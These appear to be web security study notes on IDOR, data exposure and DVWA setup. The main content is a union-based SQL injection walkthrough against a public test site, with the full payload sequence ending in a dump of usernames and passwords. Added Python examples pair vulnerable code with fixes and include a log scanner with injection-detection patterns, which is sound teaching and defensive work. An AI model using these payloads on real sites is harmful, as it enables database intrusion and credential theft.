grapes
a guest, Nov 23rd, 2018
Insecure Direct Object Reference
Sensitive Data Exposure
DVWA set up and configuration
Union Based SQL Injection
_______________________________
Insecure Direct Object Reference

It is a vulnerability in which an attacker who is authorised to see his/her own dashboard is able to gain access to some other user's account, for
example
http://anywebsite.com/dashboard?user=someuser or id=12342
http://anywebsite.com/dashboard?user=randomuser or id=12348
If a hacker is able to change the parameter assigned by the website to some other value and thereby gain access to another user's account, that is an IDOR vulnerability.
-> the hacker can also change passwords
http://anywebsite.com/changepassword?user=someuser

why this attack occurs
->developers use direct references to restricted resources and the application fails to verify whether the user is authorised or not.
->improper access checks

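The dashboard?user=...&id=... pattern above, as an added example (not code from the original notes or from any real site): the handler that authenticates the caller but trusts the id parameter, beside a version that checks ownership, and a version that drops the parameter altogether. Account ids, users and session tokens are constructed sample data; the function names are my own.

```python
# Added example (not from the original notes): the IDOR pattern described above,
# with the unchecked "dashboard?user=...&id=..." handler beside a hardened one.
# All users, accounts and session tokens below are constructed sample data.

ACCOUNTS = {                      # constructed: account id -> record
    12342: {"owner": "someuser",   "email": "someuser@example.com"},
    12348: {"owner": "randomuser", "email": "randomuser@example.com"},
}
SESSIONS = {                      # constructed: session token -> logged-in user
    "tok-someuser": "someuser",
    "tok-randomuser": "randomuser",
}


def dashboard_vulnerable(session_token, account_id):
    """Authenticates the caller but trusts the id parameter: classic IDOR.

    Returns (http_status, record). Any logged-in user can read any account
    simply by changing the id in the URL."""
    if session_token not in SESSIONS:
        return 401, None
    record = ACCOUNTS.get(account_id)
    if record is None:
        return 404, None
    return 200, record


def dashboard_fixed(session_token, account_id):
    """Same lookup, but the application verifies that the authenticated user
    owns the requested object before returning it.

    A 404 is returned for both "missing" and "not yours" so the response does
    not confirm which account ids exist."""
    user = SESSIONS.get(session_token)
    if user is None:
        return 401, None
    record = ACCOUNTS.get(account_id)
    if record is None or record["owner"] != user:
        return 404, None
    return 200, record


def dashboard_from_session(session_token):
    """Stronger still: do not take the object id from the request at all.
    The record is looked up from the identity bound to the session, so there
    is no parameter for the caller to tamper with."""
    user = SESSIONS.get(session_token)
    if user is None:
        return 401, None
    for account_id, record in ACCOUNTS.items():
        if record["owner"] == user:
            return 200, dict(record, id=account_id)
    return 404, None


if __name__ == "__main__":
    # someuser changing the id in the URL to randomuser's account
    print(dashboard_vulnerable("tok-someuser", 12348))   # leaks the other account
    print(dashboard_fixed("tok-someuser", 12348))        # (404, None)
    print(dashboard_from_session("tok-someuser"))        # own account only
```

The ownership check belongs in the handler (or a shared authorisation layer), not in the client: the id is attacker-controlled input like any other. Returning the same 404 for "does not exist" and "not yours" also stops the endpoint from being used to enumerate valid ids.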
--->WAVE
____________________________
Sensitive Data Exposure
Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion, at rest, or even in the customer's/user's browser


eg 1
An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.

eg 2
A site simply doesn't use SSL for all authenticated pages. The attacker simply monitors network
traffic (like an open wireless network) and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's session, accessing the user's private data.

________________________________________
DVWA set up and configuration
install XAMPP

X->cross platform
A->Apache
M->MySQL
P->PHP
P->Perl

XAMPP-> It is a lightweight software distribution that makes it extremely easy for developers to create a local web server for testing and deployment purposes

DVWA->Damn Vulnerable Web App
DVWA is a vulnerable app by default; budding security students can learn to attack and patch vulnerabilities by performing attacks on this application


->unzip the file
->copy the folder and paste it in C:\xampp\htdocs
->open XAMPP -> start Apache -> start MySQL
->open the pasted folder ("dvwa" in this case)
->navigate to the folder 'config'
->open the config.php file and leave password="" (blank)
->open the browser and go to 127.0.0.1/dvwa
->click on 'click to create a database'
__________________________________

Union SQL Injection
->testphp.vulnweb.com

-> find a parameter
test whether it is backed by an SQL database or not
->check errors

http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat=1'

->Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74

->http://testphp.vulnweb.com/listproducts.php?cat=1' order by 1--+
->remove '
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--+
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5--+
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--+
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--+
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11--+
->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--+
-> Error: Unknown column '12' in 'order clause' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
search art
-->Unknown column<--
--> now we know that we have 11 columns (order by 11 works, order by 12 errors)
->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11--+
->we get the column numbers that are reflected on the page
2,7,9


->version()
->database()
->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables--+
->It will give us the list of table names; now we know which table to use/select
->>"users"
->now we need columns
->>http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,column_name,8,9,10,11 from information_schema.columns where table_name="users"--+
->now we know we have column names like -->>>>>>>>>> uname,pass,address,email,name
->where can the juicy info be found?
->uname,pass,address
->so
->
->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,group_concat(uname,':',pass),8,9,10,11 from users--+

-> and we get username and password
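The listproducts.php lookup above, rebuilt as an added example (not the site's real code and not from the original notes) so the root cause and the fix sit side by side: the category parameter pasted into the statement, beside the same query with a bound parameter. It uses an in-memory SQLite database with constructed sample rows in place of MySQL, so the union payload from the notes is reduced to the three columns this toy table has and uses `||` instead of group_concat(a,':',b), which SQLite does not support; all table, column and function names here are my own.

```python
# Added example (not from the original notes): a listproducts-style lookup
# built with string concatenation beside the parameterised version. Uses an
# in-memory SQLite database with constructed sample rows; the payload is the
# "union select" from the notes, reduced to the three columns this toy table has.
import sqlite3


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 'Lamp', 1), (2, 'Chair', 1), (3, 'Desk', 2);
        -- constructed credentials
        INSERT INTO users VALUES ('test', 'test'), ('admin', 's3cret');
    """)
    return conn


def list_products_vulnerable(conn, cat):
    """The cat parameter is pasted straight into the statement, so a value such
    as  1 union select ...  changes the query instead of being treated as data."""
    sql = "SELECT id, name, cat FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()


def list_products_fixed(conn, cat):
    """Parameterised statement: the driver sends cat as a bound value, so the
    whole string is compared against the column and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, name, cat FROM products WHERE cat=?", (cat,)
    ).fetchall()


def list_products_fixed_and_validated(conn, cat):
    """Belt and braces: also reject anything that is not an integer id, and
    never echo the driver's error text (which leaks table/column details, as the
    MySQL error in the notes does) back to the client."""
    if not cat.isdigit():
        return "error"            # generic client-facing error, no DB details
    try:
        return conn.execute(
            "SELECT id, name, cat FROM products WHERE cat=?", (int(cat),)
        ).fetchall()
    except sqlite3.Error:
        return "error"            # log the real exception server-side instead


# The union payload from the notes, shaped for a 3-column result set;
# "--+" in a URL decodes to "-- ", which comments out the rest of the line.
PAYLOAD = "1 union select 1, uname || ':' || pass, 3 from users -- "


def leaked_credentials(rows):
    """Helper: which user:pass strings ended up in the product listing."""
    return sorted(r[1] for r in rows if ":" in str(r[1]))


if __name__ == "__main__":
    db = build_db()
    print(leaked_credentials(list_products_vulnerable(db, PAYLOAD)))  # credentials in the listing
    print(list_products_fixed(db, PAYLOAD))                           # []
    print(list_products_fixed_and_validated(db, PAYLOAD))             # error
```

The parameterised query alone stops the injection: the bound string is compared with the cat column as a value, matches nothing, and the users table is never touched. Input validation and a generic error page are added on top because the verbose MySQL error in the notes is exactly what told the tester the backend was injectable and how many columns the query had.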
union-> UNION is an SQL operator; its job is to combine the results of two or more SELECT statements into a single result set, which is then returned as part of the HTTP response.

->order by is used for sorting

->Select->
A select query is a database object that shows information in Datasheet view

what is information schema?
->
Information schema is a set of system structures which store metadata and other information about tables, views, columns and procedures in a database

(the database's mother)
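The probing sequence in the union section (the single-quote test, the order by 1..12 column count, then union select against information_schema) leaves a distinctive trail in a web server's access log. As an added example that is not part of the original notes, here is a small scanner that flags those requests per parameter value and counts the order by probes per client, since one such request can be innocent but a run of them is the column-counting loop. The log lines are constructed (RFC 5737 test addresses, paths mirroring the notes); the rule names and functions are my own.

```python
# Added example (not from the original notes): a small access-log scanner that
# flags the probing sequence described in the union section (quote test,
# "order by N" column counting, union select, information_schema reads).
# The log lines are constructed; the paths mirror the notes.
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
203.0.113.7 - - [23/Nov/2018:10:00:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 5120
203.0.113.7 - - [23/Nov/2018:10:00:05 +0000] "GET /listproducts.php?cat=1' HTTP/1.1" 200 1340
203.0.113.7 - - [23/Nov/2018:10:00:12 +0000] "GET /listproducts.php?cat=1%20order%20by%2011--+ HTTP/1.1" 200 5120
203.0.113.7 - - [23/Nov/2018:10:00:15 +0000] "GET /listproducts.php?cat=1%20order%20by%2012--+ HTTP/1.1" 200 1410
203.0.113.7 - - [23/Nov/2018:10:00:40 +0000] "GET /listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,table_name,8,9,10,11%20from%20information_schema.tables--+ HTTP/1.1" 200 7000
198.51.100.9 - - [23/Nov/2018:10:01:00 +0000] "GET /listproducts.php?cat=2 HTTP/1.1" 200 4800
198.51.100.9 - - [23/Nov/2018:10:01:03 +0000] "GET /search.php?q=order+by+size HTTP/1.1" 200 2200
"""

# Apache/nginx "combined"-style line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Rules run against each URL-decoded, lower-cased parameter value.
RULES = [
    ("quote_probe",        re.compile(r"'\s*$")),                        # value ending in '
    ("order_by_count",     re.compile(r"\border\s+by\s+\d+\s*(--|#|$)")),  # order by <number>
    ("union_select",       re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
]


def parse_line(line):
    """Split one log line into its fields plus decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl decodes %20 and turns '+' into a space, so "--+" becomes "-- "
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def scan_log(text):
    """Return one finding per (line, parameter, rule) hit, plus per-IP counts of
    ORDER BY probes, which reveal the column-counting loop even when a single
    request looks harmless."""
    findings = []
    order_by_hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            low = value.lower()
            for rule, rx in RULES:
                if rx.search(low):
                    findings.append({"line": n, "ip": rec["ip"], "path": rec["path"],
                                     "param": name, "rule": rule})
                    if rule == "order_by_count":
                        order_by_hits[rec["ip"]] = order_by_hits.get(rec["ip"], 0) + 1
    return findings, order_by_hits


def suspicious_ips(findings, order_by_hits, min_order_by=2):
    """Clients that read information_schema / used union select, or that ran at
    least min_order_by ORDER BY probes."""
    ips = {f["ip"] for f in findings if f["rule"] in ("union_select", "information_schema")}
    ips |= {ip for ip, count in order_by_hits.items() if count >= min_order_by}
    return sorted(ips)


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"line {f['line']:>2} {f['ip']:<14} {f['path']} {f['param']}={f['rule']}")
    print("order-by probes per ip:", counts)
    print("suspicious:", suspicious_ips(found, counts))
```

Matching on decoded parameter values rather than the raw request line is what keeps the legitimate search for "order by size" from firing (the rule wants a bare number after ORDER BY, as in the column-count loop) while still catching the %20- and +-encoded forms. In practice the same rules belong in a WAF or SIEM query, and the per-client ORDER BY count is the signal worth alerting on, since a single probe is noise but a run of them almost never is.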